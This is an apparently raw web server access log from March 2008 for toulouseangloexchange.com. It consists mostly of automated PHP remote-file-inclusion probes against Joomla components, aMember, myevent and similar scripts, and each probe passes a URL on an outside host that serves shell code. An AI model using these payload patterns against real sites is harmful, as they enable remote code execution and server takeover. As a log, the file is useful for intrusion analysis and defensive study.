82.207.81.170 - - [09/Mar/2008:18:48:08 -0700] "GET /logs/%3Cwbr%20/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
63.195.191.15 - - [09/Mar/2008:18:49:04 -0700] "GET /logs/access_071105.log//tools/send_reminders.php?noSet=0&includedir=http://www.fansvictorvaldes.es//images/data/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
63.195.191.15 - - [09/Mar/2008:18:49:05 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.fansvictorvaldes.es//images/data/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
199.72.199.24 - - [09/Mar/2008:18:51:16 -0700] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
199.72.199.24 - - [09/Mar/2008:18:51:16 -0700] "GET //skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
199.72.199.24 - - [09/Mar/2008:18:51:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
199.72.199.24 - - [09/Mar/2008:18:51:17 -0700] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
199.72.199.24 - - [09/Mar/2008:18:51:17 -0700] "GET //skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
199.72.199.24 - - [09/Mar/2008:18:51:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
199.72.199.24 - - [09/Mar/2008:18:54:19 -0700] "GET /logs/access_071105.log//skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
199.72.199.24 - - [09/Mar/2008:18:54:24 -0700] "GET /logs/access_071105.log//skin/zero_vote/error.php?dir=http://xucx.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.34.145.195 - - [09/Mar/2008:18:57:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.toulouseangloexchange.com"
64.34.145.195 - - [09/Mar/2008:18:57:55 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.toulouseangloexchange.com"
212.205.236.160 - - [09/Mar/2008:18:58:45 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://webetab.ac-bordeaux.fr/Primaire/64/tice64/local/2008???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
212.205.236.160 - - [09/Mar/2008:18:58:46 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://webetab.ac-bordeaux.fr/Primaire/64/tice64/local/2008???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
212.205.236.160 - - [09/Mar/2008:18:58:46 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://webetab.ac-bordeaux.fr/Primaire/64/tice64/local/2008???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [09/Mar/2008:18:58:51 -0700] "GET /logs/access_080128.log/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [09/Mar/2008:18:58:59 -0700] "GET /logs/access_080128.log/modules/My_eGallery/index.php?basepath=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
72.32.210.47 - - [09/Mar/2008:19:00:56 -0700] "GET /main.php?appserv_root=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
80.38.62.39 - - [09/Mar/2008:19:01:21 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
80.38.62.39 - - [09/Mar/2008:19:01:21 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
80.38.62.39 - - [09/Mar/2008:19:01:23 -0700] "GET //prepare.php?xcart_dir=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
80.38.62.39 - - [09/Mar/2008:19:01:23 -0700] "GET /logs//prepare.php?xcart_dir=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:19:01:31 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071126.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:02:33 -0700] "GET /myevent.php?myevent_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.207.81.170 - - [09/Mar/2008:19:05:12 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071126.log/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.112.124.79 - - [09/Mar/2008:19:05:29 -0700] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://acs-fungamer.de/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
82.112.124.79 - - [09/Mar/2008:19:05:29 -0700] "GET /?mosConfig_absolute_path=http://acs-fungamer.de/images/can?? HTTP/1.1" 200 919 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
82.112.124.79 - - [09/Mar/2008:19:05:29 -0700] "GET /logs/?mosConfig_absolute_path=http://acs-fungamer.de/images/can?? HTTP/1.1" 200 4227 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
216.155.202.175 - - [09/Mar/2008:19:08:16 -0700] "GET /logs/access_071217.log HTTP/1.1" 200 524288 "-" "Yahoo! Mindset" "www.toulouseangloexchange.com"
60.249.42.221 - - [09/Mar/2008:19:09:37 -0700] "GET /main.php?appserv_root=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:10:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:10:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:10:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:10:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:10:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:10:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:10:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:10:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
82.112.124.79 - - [09/Mar/2008:19:10:37 -0700] "GET /?mosConfig_absolute_path=http://acs-fungamer.de/images/can?? HTTP/1.1" 200 919 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
212.17.26.135 - - [09/Mar/2008:19:11:28 -0700] "GET /include/statistic.inc.php?tm_includepath=http://it.geocities.com/biglionpowa/bsid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:15 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:15 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:15 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:17 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:17 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:17 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:17 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:18 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:19 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:19 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:22 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:23 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:23 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:24 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:26 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:27 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:29 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:13:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.54.6 - - [09/Mar/2008:19:14:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=[NeoxCmd]?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.26.54.6 - - [09/Mar/2008:19:14:43 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://qensch.freehostia.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.102.0.104 - - [09/Mar/2008:19:16:19 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.toulouseangloexchange.com"
212.102.0.104 - - [09/Mar/2008:19:16:19 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.compuweb.com.gt/phplive/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:22 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:22 -0700] "GET /logs/%3Cwbr%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:24 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:24 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:24 -0700] "GET /logs/%3Cwbr%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:25 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:25 -0700] "GET /logs/%3Cwbr%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:25 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:25 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:16:25 -0700] "GET /logs/%3Cwbr%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:17:53 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:17:53 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:17:53 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:17:53 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:18:27 -0700] "GET /logs/access_080211.log/myevent.php?myevent_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:18:27 -0700] "GET /logs/myevent.php?myevent_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:18:47 -0700] "GET /logs/access_080107.log/myevent.php?myevent_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.32.210.47 - - [09/Mar/2008:19:20:42 -0700] "GET /logs/access_080121.log/main.php?appserv_root=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.32.210.47 - - [09/Mar/2008:19:20:42 -0700] "GET /main.php?appserv_root=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.32.210.47 - - [09/Mar/2008:19:20:42 -0700] "GET /logs/main.php?appserv_root=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.32.210.47 - - [09/Mar/2008:19:20:44 -0700] "GET /logs/access_080204.log/main.php?appserv_root=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
